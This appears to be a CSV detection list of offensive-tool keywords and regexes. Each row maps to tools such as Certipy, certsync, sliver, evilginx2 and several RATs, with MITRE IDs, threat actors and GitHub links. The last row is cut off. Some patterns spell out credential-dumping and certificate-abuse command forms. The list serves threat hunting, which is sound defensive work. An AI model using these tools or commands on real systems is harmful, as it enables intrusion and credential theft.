"*certi.py_vulntemplates_output*",".{0,1000}certi\.py_vulntemplates_output.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38002" "*certi_py_enum*",".{0,1000}certi_py_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38003" "*Certify.exe *",".{0,1000}Certify\.exe\s.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","38004" "*Certify.exe *",".{0,1000}Certify\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","38005" "*Certify.exe*",".{0,1000}Certify\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38006" "*certipy account *",".{0,1000}certipy\saccount\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38007" "*certipy auth *",".{0,1000}certipy\sauth\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38008" "*certipy ca *",".{0,1000}certipy\sca\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38009" "*certipy ca -backup*",".{0,1000}certipy\sca\s\-backup.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services 
enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38010" "*certipy cert *",".{0,1000}certipy\scert\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38011" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38012" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38013" "*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38014" "*certipy forge 
*",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38015" "*Certipy not found. Please install Certipy before running ADCSync*",".{0,1000}Certipy\snot\sfound\.\sPlease\sinstall\sCertipy\sbefore\srunning\sADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","38016" "*certipy relay *",".{0,1000}certipy\srelay\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38017" "*certipy relay -ca *",".{0,1000}certipy\srelay\s\-ca\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38018" "*certipy req *",".{0,1000}certipy\sreq\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation 
tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38019" "*certipy req -u * -p * -target-ip * -dc-ip * -ca *",".{0,1000}certipy\sreq\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-target\-ip\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-ca\s.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","38020" "*certipy req -username *",".{0,1000}certipy\sreq\s\-username\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38021" "*certipy shadow *",".{0,1000}certipy\sshadow\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38022" "*certipy template *",".{0,1000}certipy\stemplate\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38023" "*certipy_enum*",".{0,1000}certipy_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn 
is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38024" "*certipy-master.zip*",".{0,1000}certipy\-master\.zip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","38025" "*CertStealer.csproj*",".{0,1000}CertStealer\.csproj.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38028" "*CertStealer.exe*",".{0,1000}CertStealer\.exe.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38029" "*CertStealer.sln*",".{0,1000}CertStealer\.sln.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","38030" "*certsync 
*--dc-ip*",".{0,1000}certsync\s.{0,1000}\-\-dc\-ip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38031" "*certsync -u *",".{0,1000}certsync\s\-u\s.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38032" "*certsync -u * -p *-d * -ca-ip *",".{0,1000}certsync\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-d\s.{0,1000}\s\-ca\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38033" "*certsync_ntds_dump*",".{0,1000}certsync_ntds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38034" "*certsync-master.zip*",".{0,1000}certsync\-master\.zip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - 
TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","38035" "*cewl --depth * --with-numbers -*",".{0,1000}cewl\s\-\-depth\s.{0,1000}\s\-\-with\-numbers\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38043" "*cf0ef69e85418ec61f9200a26553738987c546710243bfae6c86b25edfdb5651*",".{0,1000}cf0ef69e85418ec61f9200a26553738987c546710243bfae6c86b25edfdb5651.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","38044" "*cf112c0d0d54cb34784dca2a61ee9e119e5e7804e38f55aa435fd885ba8f6d5b*",".{0,1000}cf112c0d0d54cb34784dca2a61ee9e119e5e7804e38f55aa435fd885ba8f6d5b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38045" "*cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f*",".{0,1000}cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the 
ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","38048" "*cf25b9f3-849e-447f-a029-2fef5969eca3*",".{0,1000}cf25b9f3\-849e\-447f\-a029\-2fef5969eca3.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","38050" "*cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12*",".{0,1000}cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","38051" "*cf27aacb093a56d56b3e6a0f5d6d1992fb1b69465e14fcb1ef13c9a57989dbad*",".{0,1000}cf27aacb093a56d56b3e6a0f5d6d1992fb1b69465e14fcb1ef13c9a57989dbad.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38052" "*cf2e73e6453dad578e2fbc308e7dfc4d44fc2eb93e612d466705723fe858f5d6*",".{0,1000}cf2e73e6453dad578e2fbc308e7dfc4d44fc2eb93e612d466705723fe858f5d6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - 
T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","38054" "*cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd*",".{0,1000}cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","38055" "*cf34d737bc503bc71f9dec42dd3c016dd9fc90120f2811e2fa36cc3b69660a33*",".{0,1000}cf34d737bc503bc71f9dec42dd3c016dd9fc90120f2811e2fa36cc3b69660a33.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38056" "*cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef*",".{0,1000}cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38057" "*cf3d0e1a42c7631616c6efb3134aa8fb0822ce9e27ed2f2427d14634f12e1209*",".{0,1000}cf3d0e1a42c7631616c6efb3134aa8fb0822ce9e27ed2f2427d14634f12e1209.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38058" "*cf40d8f944e06150ba37c216c6c5899bb4618374eee80347e11e3f3e21b9968b*",".{0,1000}cf40d8f944e06150ba37c216c6c5899bb4618374eee80347e11e3f3e21b9968b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38060" "*cf615f0091a045903318a5c1d3c7eb37d337c26ceb3b682a3b68fc820913bac6*",".{0,1000}cf615f0091a045903318a5c1d3c7eb37d337c26ceb3b682a3b68fc820913bac6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","38065" "*cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4*",".{0,1000}cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","38066" "*cf78b329b4dcb1c211415309e2ddbf80833ad1669fd142a67c916aa6a8cecb88*",".{0,1000}cf78b329b4dcb1c211415309e2ddbf80833ad1669fd142a67c916aa6a8cecb88.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","#filehash","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","38068" "*cf840440b78deadaf6f4f085db860d3bc69ce480edc505a378f733127ff37bc6*",".{0,1000}cf840440b78deadaf6f4f085db860d3bc69ce480edc505a378f733127ff37bc6.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","38070" "*CF8C386C-46B2-4F40-BCB1-774C01E72B1C*",".{0,1000}CF8C386C\-46B2\-4F40\-BCB1\-774C01E72B1C.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38074" "*cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95*",".{0,1000}cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38075" 
"*CF924967-0AEC-43B2-B891-D67B6DB9F523*",".{0,1000}CF924967\-0AEC\-43B2\-B891\-D67B6DB9F523.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","#GUIDproject","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","38076" "*cf9e538aaea081090e945093f69919d1a76c34f0200ffb1a61684273bf43eba4*",".{0,1000}cf9e538aaea081090e945093f69919d1a76c34f0200ffb1a61684273bf43eba4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","38077" "*cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15*",".{0,1000}cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38078" "*cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51*",".{0,1000}cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","38079" "*cfa67ee856362f2ee50affde932411c76eaa74329a59141b6c5c0ccbf65031c8*",".{0,1000}cfa67ee856362f2ee50affde932411c76eaa74329a59141b6c5c0ccbf65031c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38081" "*cfaeab5ed1fab3145ab6bd8ceeafa35b7d7b10851f949d6c20fde81d8b4d4782*",".{0,1000}cfaeab5ed1fab3145ab6bd8ceeafa35b7d7b10851f949d6c20fde81d8b4d4782.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
